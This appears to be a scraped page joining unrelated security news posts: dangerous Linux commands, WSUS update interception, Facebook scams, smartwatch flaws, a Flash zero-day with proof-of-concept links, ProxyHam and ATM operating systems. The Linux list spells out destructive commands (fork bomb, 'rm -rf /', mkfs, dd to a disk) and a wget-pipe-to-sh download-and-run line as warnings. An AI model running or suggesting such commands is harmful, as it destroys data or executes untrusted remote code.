Linux shell or terminal commands are very powerful and just a simple command could lead one to delete a folder, files or root folder, etc. Linux never asks for confirmation rather it will execute the command right away causing you to lose useful data and information stored in these files and folders.

Take a look at the 9 commands and codes you should avoid executing.

1. Linux Fork Bomb Command

:(){ :|: & };: also known as Fork Bomb is a denial-of-service attack against a Linux System. :(){ :|: & };: is a bash function. Once executed, it repeats itself multiple times until the system freezes.

To get ride of this you need to restart or reboot your server. So be careful when executing this command on your Linux shell.

2. Mv Folder/Dev/Null Command

mv folder/dev/null is another risky command. Dev/null or null device is a device file that discards all the data written on it but it reports that the writing operation is executed successfully. It is also known as bit bucked or black hole.

3. Rm -Rf Command

rm -rf command is a to delete a folder and its content in the Linux operating system. If you don’t know how to use it then its very dangerous to the system. The most common combinations and options used with rm-rf command are listed below:

  • rm command is used to delete the files in Linux system.
  • rm -f command removes read-only files in folder without prompting.
  • rm -r command deletes the content of a folder recursively.
  • rm -d command is used to remove an empty directory but it will refuse to remove directory if it is not empty.
  • rm -rf/ command is used for forced deletion (it deletes it even if it’s write protected) of all the content in root directory and sub folders.
  • rm -rf* command is used for forced deletion of all the content in the current directory (directory you are currently working in) and sub folders.
  • rm -rf. command is used for forced deletion of all the content in the current folder and sub folders. The rm -r.[^.]* command can also be used.
  • rm -i command is used for removal of files and folders but a prompt will appear before removal.

4. Mkfs Command

mkfs can be a dangerous command for your Linux based system if you don’t know its purpose. Anything written after the mkfs will be formatted and replaced by a blank Linux file system.

The below given commands will format the hard drive and need administration power

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat
  • mkfs.cramfs ( No need of administration power)

5. Tar Bomb

The tar command is used combine many number of files to single file (archived file) in.tarformat. A Tape Archive (Tar) bomb can be created with this command.

It is an archive file which explodes into thousands or millions of files with names similar to the existing files into the current directory rather than into a new directory when untarred.

To avoid becoming a victim of a tar bomb by regularly creating a new protective directory whenever you receive a tar file and then moving the received tar file into this directory before untarring.If the tar file is indeed a tar bomb then you can simply remove the newly created directory to get rid of it.

Another way to avoid the explosion of a tar bomb is via the -t option to list all of the content of a tar file to give you an idea of the type of content contained within the tar file.

6. Dd Command

The dd command is used to copy & convert hard disk partitions. However, it can turn out to be harmful if you specify the wrong destination.

The command may be any one of these:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda
  • dd if=/dev/zero of=/dev/had (will zero out the whole primary hard drive)

7. Shell Script Code

Someone may victimize you by giving you the link to a shell script and endorsing you to download and execute it. The script may contain some malicious or dangerous code inside. The format of command may look like this: wget http://some_malicious_source -O- | sh. The wget will download the script while the sh downloads the script execution.

8. Malicious Source Code

Someone gives you the source code and asks you to compile it. The code may appear to be a normal code but in fact some malicious code is disguised in the large source code and it may cause harm to your system. To avoid being victimized by this kind of attack, only accept and compile your source code from trustworthy sources.

9. Decompression Bomb

You have received a compressed file and you are asked to extract this file which appears to be very small in size but may be a few KB. In fact, this small sized compressed file contains very highly compressed data.

Once the file is decompressed, hundreds of GB of data is extracted which can fill up your hard drive to bring down the performance of your system.

 

 If you think that the patches delivered through Windows update can not be laced with malware, think again.
Security researchers have shown that Hackers could intercept Windows Update to deliver and inject malware in organizations.
Security researchers from UK-based security firm ‘Context’ have discovered a way to exploit insecurely configured implementations of Windows Server Update Services (WSUS) for an enterprise.

What is WSUS in Windows?

Windows Server Update Services (WSUS) allows an administrator to deploy the Windows software update to servers and desktops throughout the organization.
These updates come from the WSUS server and not Windows server.
Once the updates are with the administrator on the server, he can limit the privilege for the clients in a corporate environment to download and install these updates. As the admin is the owner of the distribution of these updates.

Intercepting WSUS to Inject Malware into Corporate Networks

By default, WSUS does not use SSL encrypted HTTPS delivery for the SOAP (Simple Object Access Protocol) XML web service. Instead, it uses the non-encrypted HTTP.
This is a major WSUS weakness that should not be ignored now. (At least when it has been exploited and shown to the world).
As WSUS installations are not configured to use SSL security mechanism, hence they are vulnerable to man-in-the-middle (MitM) attacks.
According to researchers Paul Stone and Alex Chapman, the attack is so simple that a hacker with low privileges can set up fake updates that can be installed automatically by connected machines.
All update packages that are downloaded from the Microsoft Update website are signed with a Microsoft signature. Which cannot be altered.
However, Hackers can alter Windows Update by installing malware in the metadata of the update.

By repurposing existing Microsoft-signed binaries, we were able to demonstrate that an attacker can inject malicious updates to execute arbitrary commands,” researchers said in the paper.

A malicious attacker can inject malware in the SOAP XML communication between the WSUS server and the client and making it look purely authentic update to install.
Windows update also includes more than 25,000 of 3rd-party drivers that are developed and signed by other developers, which can also be altered easily.

Our concern is that when plugging in a USB device, some of these drivers may have vulnerabilities that could be exploited for malicious purposes. Everyone is familiar with the ‘searching for Drivers’ and ‘Windows Update’ dialog boxes on their desktops – but these seemingly innocuous windows may be hiding some serious threats.

So, now it can be a big security threat for the new Windows 10. Either the corporates are going to live in the era of old Windows or upgrade and welcome the malware!
The researchers demonstrated the hack at the Black Hat security conference in Las Vegas this week in a talk titled, WSUSpect: Compromising the Windows Enterprise via Windows Update [PDF].

 

fbscam

The bigger and popular sites with the huge number of visitors are like hackers’ wonderland for posting scams. Especially the users on social media websites are prone to such scams that further convert to dangerous cyber attacks. Facebook has about 1.4 billion users making it potentially the most active social media site for the hackers.

These are some of the common Facebook scams that you might fall for if you haven’t already:

5) Viral Videos/ Scandals

The word “Viral” itself has become viral which makes you yearn and see the content inside. It could be anything ranging from cute puppy videos to horrendous torture videos by terrorists. More popular in these viral videos are salacious celebrity scandals which generally contain no video at all- but a link to another phishing website or require to install an update or a plugin. Once you do that, the virus is automatically installed in your system. And you know what happens next..

You will never get adult videos on any social media website, so if you happen to scroll through one on your home page, then it is definitely a Facebook scam.

4) Free Giveaways/Survey Scams

Nothing is free in this world my friend. Especially free travel tickets, and definitely not iPhones, iPads or Mac. The social media are full of such spam offers that sound too good to be true, and coaxes you as if you are the world’s luckiest person.

There are also survey scams that trick you into giving your personal information in exchange of gift vouchers or free trips. Do not fall for these Facebook scams and never forward them to your contacts either, else you would end up spamming your friends too.

3) Facebook Customization

If any link on your home page claims to change the layout, color or give you a special “Dislike Button” give any special functionality, then it is probably another Facebook scam. You can’t just change the official interface of the world’s biggest social media website by clicking a few phishing links.

These scams will either ask you to install their specific Facebook app or ask to fill a desirability form of what changes you want. Once in, they will get full access to your data or through phishing forms spread malware into your system.

If Facebook would some day want to give you customization features, then they make a grand announcement, not any hidden link. So, be alert and avoid yourself from such Facebook scams.

2) Celebrity Friend Requests/Charity

This might not happen as frequently as others but when someone falls for this Facebook scam, it hits him/her very hard. You come by a friend request of a celebrity or from so-called official  page. Then they will ask you to donate some money for the poor or the disaster struck people.

Either they will ask your credentials or directly tell you to donate through online payment services. Never trust such messages to stay safe on Facebook.

1) Who Viewed My Profile?

This is the biggest and most pervasive Facebook scam ever. Facebook has made it pretty clear that there is no way any app can tell who has visited your profile and how many times. Any link or app that claims to do so is a scam.

In these scams, you will have to give in your information and accept their terms and conditions. This scam play with the emotions of the users as most of us want to know if their secret crush or an ex-partner visits them online.

The application does tell who viewed your profile based on an algorithm, but till then you are already been infected by the app and under attack.

So, avoid all these malicious and fraudulent apps and links to be safe on the social media. With this, we end the list of biggest Facebook scams.

We will let you know if come by any more of such scams. You can also tell us, and our fossBytes community, if you happen to know some other scams.

android-wear-lollipop-watchface-variety-970-80Do you own a Smartwatch? If yes, then how safe it is? There are almost 100 percent chances that you own a vulnerable Smartwatch.
Computer manufacturer Hewlett-Packard is warning users of smartwatches including Apple Watch and Samsung Gear that their wearable devices are vulnerable to cyber attacks.
In a study, HP’s Fortify tested today’s top 10 smartwatches for security features, such as basic data encryption, password protection and privacy concerns.
The most shocking part of the study was that –
 

Not even a Single Smartwatch Found to be 100 percent Safe

Security experts found that 100 percent of wearable devices contained at least one serious security vulnerability that could make the devices vulnerable to hackers.
With the increase in the adoption of smartwatches, manufacturers need to pay closer attention to the customers’ security because these wearable devices could potentially open doors to new threats to personal and sensitive information.

“As the adoption of Smartwatches accelerates, the platform will become vastly more attractive to those who would abuse that access, making it critical that we take precautions when transmitting personal data or connecting Smartwatches into corporate networks,” Jason Schmitt, general manager at HP’s Security Fortify said in a statement.

The study [PDF], no doubt, had included Smart watches by Apple, Pebble, Samsung and Sony, as it claims to have picked top 10 smartwatches.

Here’s the list of issues reported by HP:

1. Lack of transport encryption – Though all products implemented transport encryption using SSL/TLS, 40 percent of devices found to be either vulnerable to the POODLE attack, allowing the use of weak cyphers, or still using SSL v2.
2. Insecure Interfaces – Three out of ten smartwatches used cloud-based web interfaces and all of them were vulnerable to account harvesting. This allowed unlimited login attempts, helping hackers guess passwords.
3. Insufficient User Authentication/Authorization – Three out of ten smartwatches completely failed to offer Two-Factor authentication, or the ability to lock accounts after 3 to 5 failed password attempts.
4. Insecure Software/Firmware – 7 out of 10 smartwatches had issues with firmware updates. The wearable devices, including smartwatches, often did not receive encrypted firmware updates, but many updates were signed to help prevent malicious firmware updates from being installed. While a lack of encryption did not allow the files to be downloaded and analyzed.
5. Privacy Concerns – Smartwatches also demonstrate a risk to personal security as well as privacy. All the tested devices collected some form of personal information, including username, address, date of birth, gender, heart rate, weight and other health information.
The experts said it would not disclose the names of smartphone manufacturers whose watches they had tested, but they are working with vendors to “build security into their products before they put them out to market.”
Meanwhile, HP urges users to not connect their smartwatches to the sensitive access control functions like cars or homes unless strong authorization is offered.
Recommendations
HP has the following recommendations for those looking to use or produce smartwatch devices in a more secure manner:
Consumer
• Do not enable sensitive access control functions (e.g., car or home access) unless strong authentication is offered (two-factor etc).
• Enable passcode functionality to prevent unauthorized access to your data, opening of doors, or payments on your behalf.
• Enable security functionality (e.g., passcodes, screen locks, two-factor and encryption).
• For any interface such as mobile or cloud applications associated with your watch, ensure that strong passwords are used.
• Do not approve any unknown pairing requests (to the watch itself).
Enterprise Technical Teams
• Ensure TLS implementations are configured and implemented properly.
• Protect user accounts and sensitive data by requiring strong passwords.
• Implement controls to prevent man-in-the-middle attacks.
• Build mobile applications (specific to each ecosystem) into the device – in addition to any vendor-provided or recommended apps.

Yet another Flash Zero-Day released last night, again this exploit is coming from the data hackers obtained from breaching ‘The Hacking Team’.Adobe-Logo-psd64589

Previous issue: CVE-2015-5119 that affected Adobe Flash Player versions 9.0 through version 18.0.0.194.

All the data obtained from this breach has been made available on a Mirror site: https://ht.transparencytoolkit.org and now WikeLeaks :https://wikileaks.org/hackingteam/emails/emailid/45977 has also uploaded this data and made it easier to investigate by allowing users to search for Keywords.

I would think there could also be more on the way!

New Zero-Day: CVE-2015-5122

Affected software versions

Adobe Flash Player 18.0.0.203 and earlier versions for Windows and Macintosh
Adobe Flash Player 18.0.0.204 and earlier versions for Linux installed with Google Chrome
Adobe Flash Player Extended Support Release version 13.0.0.302 and earlier 13.x versions for Windows and Macintosh
Adobe Flash Player Extended Support Release version 11.2.202.481 and earlier 11.x versions for Linux

Adobe Security Bulletin

https://helpx.adobe.com/security/products/flash-player/apsa15-04.html

WikiLeaks Reference – New Zero-Day

https://wikileaks.org/hackingteam/emails/emailid/45977

Link to the New POC

http://pastebin.com/QiMumzqx

Link to the Old POC

http://pastebin.com/CcJQRxhy

POC

Public POC when ran in the Browser the exploit opens the Calc.exe on Windows.

Picture compliments of @dummys1337

1435703982690410

It’s dubbed ProxyHam and it’s a ‘hardware proxy’ that will allow users to connect to a long distance public WiFi using unidentifiable low-frequency radio channels. It is comprised of a WiFi enabled Raspberry Pi along with three antennas. One antenna is used to connect to a public WiFi network at a public place such as a Starbucks or McDonalds. The other two antennas are setup between the WiFi hotpot and you and are used to transmit the WiFi signal at a 900MHz frequency. By relaying on a 900MHz radio connection, ProxyHam effectively connects to a far-away WiFi network with a range of around 1 and 2.5 Miles depending on interference.

Caudill will unveil ProxyHam at the Def Con hacker conference in Las Vegas next month. Caudill also said that and his colleagues are working on additional features like a self-destruction and hiding the ProxyHam in things like books.

The ProxyHam is going to be selling for around $200 (£130) and will eventually be able to drop to $150 (£95).

You can read more about the ProxyHam here: motherboard.vice.com

tv-300x2241

The ATM Industry Association (ATMIA) has declared its next major migration to a Windows ATM operating system would be to Windows 10, bypassing Windows 8. With the announcement, it is clear that ATMs running older versions of Windows will be upgraded to latest Windows 10 when the OS will be available.

Windows 10 for ATMs

The main reason advertised for adopting this migration path is increased security for protection against malware and other forms of cyber-attack offered by Windows 10 and cost-to-benefit analysis to establish a strong business case for migration strategy.

Some other benefits of migrating from Windows XP, Windows 7 or Windows CE to Windows 10 are – New Microsoft philosophy of one system for all – “a single Windows for everything”

  • Overcoming previous disadvantages of Windows 8Atm-windows-xp
  • Availability of periodic updates, like service packs, etc.

ATMIA CEO Mike Lee had the following to say on the planned migration process-

ATM deployers should start their 2020 migration without delay as ATM hardware purchased now will still be in use when support for Windows 7 OS ends in that year. This means terminals would need to be upgradeable and compatible with the next big operating system. It’s important to know which ATM configurations are going to be Windows 10 compatible.”

We expect there to be some parallel trajectories in future with a mainstream solution adopted by the majority of deployers, probably Windows 10 in our view, and alternative systems like Linux and Android”, he further added.

This means ATMIA will continue to explore and discuss alternative operating systems in its Next Generation ATM Architecture Committee.

The ATM Industry Association is a non-profit trade association serving all businesses and groups in the ATM industry. The association is made up of over 5,000 members in 65 countries and represents well over 1.5 million ATMs internationally.